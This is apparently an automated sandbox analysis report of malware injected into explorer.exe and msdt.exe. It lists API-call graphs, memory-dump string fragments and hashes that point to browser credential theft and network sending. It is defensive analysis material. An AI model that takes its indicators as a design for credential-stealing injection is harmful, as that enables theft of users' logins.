                            • Source File: 00000001.00000002.530572825.0000000010000000.00000040.80000000.00040000.00000000.sdmp, Offset: 10000000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_10000000_explorer.jbxd
                            Similarity
                            • API ID: connect
                            • String ID: conn$ect
                            • API String ID: 1959786783-716201944
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 298 100d5732-100d5768 299 100d5788-100d57ab connect 298->299 300 100d576a-100d5782 call 100d8942 298->300 300->299
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.530572825.0000000010000000.00000040.80000000.00040000.00000000.sdmp, Offset: 10000000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_10000000_explorer.jbxd
                            Similarity
                            • API ID: connect
                            • String ID: conn$ect
                            • API String ID: 1959786783-716201944
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 303 100d562c-100d566b 304 100d566d-100d5685 call 100d8942 303->304 305 100d568b-100d56a6 WSAStartup 303->305 304->305
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.530572825.0000000010000000.00000040.80000000.00040000.00000000.sdmp, Offset: 10000000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_10000000_explorer.jbxd
                            Similarity
                            • API ID: Startup
                            • String ID: WSAS$tart
                            • API String ID: 724789610-2426239465
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 308 100d5632-100d566b 309 100d566d-100d5685 call 100d8942 308->309 310 100d568b-100d56a6 WSAStartup 308->310 309->310
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.530572825.0000000010000000.00000040.80000000.00040000.00000000.sdmp, Offset: 10000000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_10000000_explorer.jbxd
                            Similarity
                            • API ID: Startup
                            • String ID: WSAS$tart
                            • API String ID: 724789610-2426239465
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 421 100d56b2-100d56e5 422 100d5705-100d572d send 421->422 423 100d56e7-100d56ff call 100d8942 421->423 423->422
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.530572825.0000000010000000.00000040.80000000.00040000.00000000.sdmp, Offset: 10000000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_10000000_explorer.jbxd
                            Similarity
                            • API ID: send
                            • String ID: send
                            • API String ID: 2809346765-2809346765
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 426 100d55b2-100d55ea 427 100d55ec-100d5604 call 100d8942 426->427 428 100d560a-100d562b socket 426->428 427->428
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.530572825.0000000010000000.00000040.80000000.00040000.00000000.sdmp, Offset: 10000000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_10000000_explorer.jbxd
                            Similarity
                            • API ID: socket
                            • String ID: sock
                            • API String ID: 98920635-2415254727
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 431 100cd2dd-100cd320 call 100d8942 434 100cd3fa-100cd40e 431->434 435 100cd326 431->435 436 100cd328-100cd339 SleepEx 435->436 436->436 437 100cd33b-100cd341 436->437 438 100cd34b-100cd352 437->438 439 100cd343-100cd349 437->439 441 100cd354-100cd35a 438->441 442 100cd370-100cd376 438->442 439->438 440 100cd35c-100cd36a call 100d7f12 439->440 440->442 441->440 441->442 443 100cd378-100cd37e 442->443 444 100cd3b7-100cd3bd 442->444 443->444 446 100cd380-100cd38a 443->446 447 100cd3bf-100cd3cf call 100cde72 444->447 448 100cd3d4-100cd3db 444->448 446->444 450 100cd38c-100cd3b1 call 100ce432 446->450 447->448 448->436 452 100cd3e1-100cd3f5 call 100cd0f2 448->452 450->444 452->436
                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.530572825.0000000010000000.00000040.80000000.00040000.00000000.sdmp, Offset: 10000000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_10000000_explorer.jbxd
                            Similarity
                            • API ID: Sleep
                            • String ID:
                            • API String ID: 3472027048-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.530572825.0000000010000000.00000040.80000000.00040000.00000000.sdmp, Offset: 10000000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_10000000_explorer.jbxd
                            Similarity
                            • API ID: CreateThread
                            • String ID:
                            • API String ID: 2422867632-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.529178775.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_e080000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                            • API String ID: 0-393284711
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.529178775.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_e080000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                            • API String ID: 0-2916316912
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.529178775.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_e080000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                            • API String ID: 0-1539916866
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.529178775.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_e080000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                            • API String ID: 0-355182820
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.529178775.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_e080000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                            • API String ID: 0-97273177
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.529178775.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_e080000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                            • API String ID: 0-639201278
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.529178775.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_e080000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                            • API String ID: 0-639201278
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.529178775.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_e080000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID: UR$2$L: $Pass$User$name$word
                            • API String ID: 0-2058692283
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.529178775.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_e080000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID: UR$2$L: $Pass$User$name$word
                            • API String ID: 0-2058692283
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.529178775.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_e080000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID: $.$e$n$v
                            • API String ID: 0-1849617553
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.529178775.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_e080000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID: 2.dl$dll$l32.$ole3$shel
                            • API String ID: 0-1970020201
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.529178775.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_e080000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4$\$dll$ion.$vers
                            • API String ID: 0-1610437797
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.529178775.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_e080000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID: 32.d$cli.$dll$sspi$user
                            • API String ID: 0-327345718
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.529178775.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_e080000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID: .dll$el32$h$kern
                            • API String ID: 0-4264704552
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.529178775.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_e080000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID: $Snif$f fr$om:
                            • API String ID: 0-3434893486
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.529178775.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_e080000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID: $Snif$f fr$om:
                            • API String ID: 0-3434893486
                            • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                            • Instruction ID: a6969f404e29adf29d8710dc8b296c890d6e2ba8f88c3d37e1ed6bcc21488d58
                            • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                            • Instruction Fuzzy Hash: A331AD71508B486FD719EB28C4846EAB7E5FB94300F50491EE4DBC7251EB31E9868A43
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.529178775.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_e080000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID: .dll$chro$hild$me_c
                            • API String ID: 0-3136806129
                            • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                            • Instruction ID: 8af5732629e95db1ae09a09dae4ee1fbfa97db55f2dfcc6a6f531152f701bec6
                            • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                            • Instruction Fuzzy Hash: 89316170218B484FCB94EF688494BAAB7E1FF98700F944A6D948ECB255DF30DD85C792
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.529178775.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_e080000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID: .dll$chro$hild$me_c
                            • API String ID: 0-3136806129
                            • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                            • Instruction ID: 2a4a27acbcc955287f73f522071b83bb8892cfd8eee24fc0166539d611148150
                            • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                            • Instruction Fuzzy Hash: 59316270218B484FCB94EF688494BAAB7E1FF98700F944A6D948ECB255DF30CD85C792
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.529178775.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_e080000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                            • API String ID: 0-319646191
                            • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                            • Instruction ID: 873086a7de5019207c82d7e3970659f2f9567a1c447c31791c0d6655950bbcb1
                            • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                            • Instruction Fuzzy Hash: 1431A031614A0D8BCB44EFA8C8847EEB7F1FF58614F40462AD49ED7240EF748A85878A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.529178775.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_e080000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                            • API String ID: 0-319646191
                            • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                            • Instruction ID: 59a0d933d29de6fa8786e5549e412ff23e3336d94bd2e09ba747ca514db47da4
                            • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                            • Instruction Fuzzy Hash: CB21B670614A4D8BCF45EFA8C8847EE7BF1FF58604F40461AD49AD7240EF748A85C785
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.529178775.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_e080000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID: .$l$l$t
                            • API String ID: 0-168566397
                            • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                            • Instruction ID: 74fdccc87ad04372ee05fba90935d18b04e575b129cd40d959ecdd0e41a4aff2
                            • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                            • Instruction Fuzzy Hash: CF217C70A24A0D9BDB08EFA8D0447EEBBF1FF18304F504A2ED089E3600DB749991CB84
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.529178775.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_e080000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID: .$l$l$t
                            • API String ID: 0-168566397
                            • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                            • Instruction ID: ad842ca716b79670600dc529a84515972ea9054fb42404e078dc79ab34e3e1cb
                            • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                            • Instruction Fuzzy Hash: AD216D70A24A0D9FDB44EFA8D0447AEBAF1FF58304F504A2ED049D3610DB749991CB84
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.529178775.000000000E080000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E080000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_e080000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID: auth$logi$pass$user
                            • API String ID: 0-2393853802
                            • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                            • Instruction ID: bd5e59bf89e6b1100eef20f9319c8e9f626c23013c29247c84b6f24585c3cd4b
                            • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                            • Instruction Fuzzy Hash: 5821CD30624B0D8BCB05DF9998906EEB7F2EF88354F104A19E44AEB244D7B1D9948BC2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Execution Graph

                            Execution Coverage:5.2%
                            Dynamic/Decrypted Code Coverage:2%
                            Signature Coverage:0%
                            Total number of Nodes:592
                            Total number of Limit Nodes:68

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 285 59a350-59a3a1 call 59af50 NtCreateFile
                            APIs
                            • NtCreateFile.NTDLL(00000060,00000000,.z`,00594BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00594BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0059A39D
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_580000_msdt.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateFile
                            • String ID: .z`
                            • API String ID: 823142352-1441809116
                            • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                            • Instruction ID: a64f79811fd4fd6a25815206bb26e48473fd3450118aeee5392e05dd7b648da1
                            • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                            • Instruction Fuzzy Hash: D7F0BDB2200208AFCB08CF88DC85EEB77ADAF8C754F158248BA1D97241C630E8118BA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 288 59a3fb-59a449 call 59af50 NtReadFile
                            APIs
                            • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!JY,FFFFFFFF,?,bMY,?,00000000), ref: 0059A445
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_580000_msdt.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileRead
                            • String ID: !JY
                            • API String ID: 2738559852-3740252954
                            • Opcode ID: e0f23ac7f3dc0e11a63064dcbe2e43e740a231549accae759e6d5e1f4bbbd549
                            • Instruction ID: 4124930f3bd7f010415f4499e3a7043a77f0fa491665e8861fa160f96f7598e4
                            • Opcode Fuzzy Hash: e0f23ac7f3dc0e11a63064dcbe2e43e740a231549accae759e6d5e1f4bbbd549
                            • Instruction Fuzzy Hash: 07F0E2B6200108AFCB14DF99CC90EEB7BA9EF8C354F158248FA1DE7251C630E8118BA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 291 59a400-59a416 292 59a41c-59a449 NtReadFile 291->292 293 59a417 call 59af50 291->293 293->292
                            APIs
                            • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!JY,FFFFFFFF,?,bMY,?,00000000), ref: 0059A445
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_580000_msdt.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileRead
                            • String ID: !JY
                            • API String ID: 2738559852-3740252954
                            • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                            • Instruction ID: dead070daef5bb03676c35ba3e26fcdd8e0f5054ab97da070c267558a1e828a8
                            • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                            • Instruction Fuzzy Hash: 80F0A4B6200208AFCB14DF89DC85EEB77ADAF8C754F158248BA1D97241D630E8118BA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 300 59a47a-59a4a9 call 59af50 NtClose
                            APIs
                            • NtClose.NTDLL(@MY,?,?,00594D40,00000000,FFFFFFFF), ref: 0059A4A5
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_580000_msdt.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close
                            • String ID: @MY
                            • API String ID: 3535843008-3636169930
                            • Opcode ID: f1ba07d1239d12174b365b41a98837ef37e76964a0f95b483b0aff5f8c168866
                            • Instruction ID: ae5db2f502a6d6b72860e7568549f846e0948ef63028f75aa2db063d6d46a5d1
                            • Opcode Fuzzy Hash: f1ba07d1239d12174b365b41a98837ef37e76964a0f95b483b0aff5f8c168866
                            • Instruction Fuzzy Hash: 0BE0EC766002106BDB14EBA8CC89EE77F58EF45360F1545A9B95D9B242D531E50087A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 303 59a480-59a496 304 59a49c-59a4a9 NtClose 303->304 305 59a497 call 59af50 303->305 305->304
                            APIs
                            • NtClose.NTDLL(@MY,?,?,00594D40,00000000,FFFFFFFF), ref: 0059A4A5
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_580000_msdt.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close
                            • String ID: @MY
                            • API String ID: 3535843008-3636169930
                            • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                            • Instruction ID: 452bbe96fc2dd4372194c0741c98d15089b63c88932f6367da2de8d4f8f70966
                            • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                            • Instruction Fuzzy Hash: CAD01776200214ABDB10EB98CC89EA77BACEF88760F154499BA1C9B242C530FA0086E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00582D11,00002000,00003000,00000004), ref: 0059A569
                            Memory Dump Source
                            • Source File: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_580000_msdt.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateMemoryVirtual
                            • String ID:
                            • API String ID: 2167126740-0
                            • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                            • Instruction ID: d8e0d27b42524a7a89c1b7555d6b4a74c28e2771d8d294964fc56d79602b1a82
                            • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                            • Instruction Fuzzy Hash: D1F015B6200208AFCB14DF89CC81EAB77ADAF88754F118148BE1C97241C630F810CBF0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.519078571.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AA0000, based on PE: true
                            • Associated: 00000002.00000002.519078571.0000000004BBB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.519078571.0000000004BBF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4aa0000_msdt.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 97cd252a309a1ed6a1e416d603f44c9a6e3378c7f8c29d2ee1ebec8f6c31fc14
                            • Instruction ID: 4eb25103c60e4f6ce8f03cd2fe8ba932e9d122d31648f0815a42afed0ab7257d
                            • Opcode Fuzzy Hash: 97cd252a309a1ed6a1e416d603f44c9a6e3378c7f8c29d2ee1ebec8f6c31fc14
                            • Instruction Fuzzy Hash: CB90027220105413F21161594504707040DD7D0285FD1C866A0415559D9696E962B161
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 245 599070-5990b2 call 59bd30 248 5990b8-599108 call 59be00 call 58ace0 call 594e40 245->248 249 59918c-599192 245->249 256 599110-599121 Sleep 248->256 257 599123-599129 256->257 258 599186-59918a 256->258 259 59912b-599151 call 598c90 257->259 260 599153-599174 call 598ea0 257->260 258->249 258->256 263 599179-59917c 259->263 260->263 263->258
                            APIs
                            • Sleep.KERNELBASE(000007D0), ref: 00599118
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_580000_msdt.jbxd
                            Yara matches
                            Similarity
                            • API ID: Sleep
                            • String ID: net.dll$wininet.dll
                            • API String ID: 3472027048-1269752229
                            • Opcode ID: 7ed88bf67dbf4bad71974df8e21c5d54c8f32e3d265ed98b999e141507852e89
                            • Instruction ID: ce3d63244fb79cd0b29df129b2f450c0366c15121b4685845a21ba8fcb31584c
                            • Opcode Fuzzy Hash: 7ed88bf67dbf4bad71974df8e21c5d54c8f32e3d265ed98b999e141507852e89
                            • Instruction Fuzzy Hash: BA31A672500705BBDB24DF64C889F67BBB8FB88B00F10851DF62E5B245D734A950CBA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 265 599067-59909f 266 5990ab-5990b2 265->266 267 5990a6 call 59bd30 265->267 268 5990b8-599108 call 59be00 call 58ace0 call 594e40 266->268 269 59918c-599192 266->269 267->266 276 599110-599121 Sleep 268->276 277 599123-599129 276->277 278 599186-59918a 276->278 279 59912b-599151 call 598c90 277->279 280 599153-599174 call 598ea0 277->280 278->269 278->276 283 599179-59917c 279->283 280->283 283->278
                            APIs
                            • Sleep.KERNELBASE(000007D0), ref: 00599118
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, Offset: 00580000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_580000_msdt.jbxd
                            Yara matches
                            Similarity
                            • API ID: Sleep
                            • String ID: net.dll$wininet.dll
                            • API String ID: 3472027048-1269752229
                            • Opcode ID: 16a58c6aa7fc799d4780ee64178f0ab9a175ae15235f76be7bd630a6c1d7706f
                            • Instruction ID: 2333b8f7b9dc6d43709becea4fb43298ed80d60cbdde0e8f4f6729913915d9ac
                            • Opcode Fuzzy Hash: 16a58c6aa7fc799d4780ee64178f0ab9a175ae15235f76be7bd630a6c1d7706f
                            • Instruction Fuzzy Hash: 4431D571900206BBDB24DF68C889FABBBB4FF88704F10841DF6296B245C774A954CBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

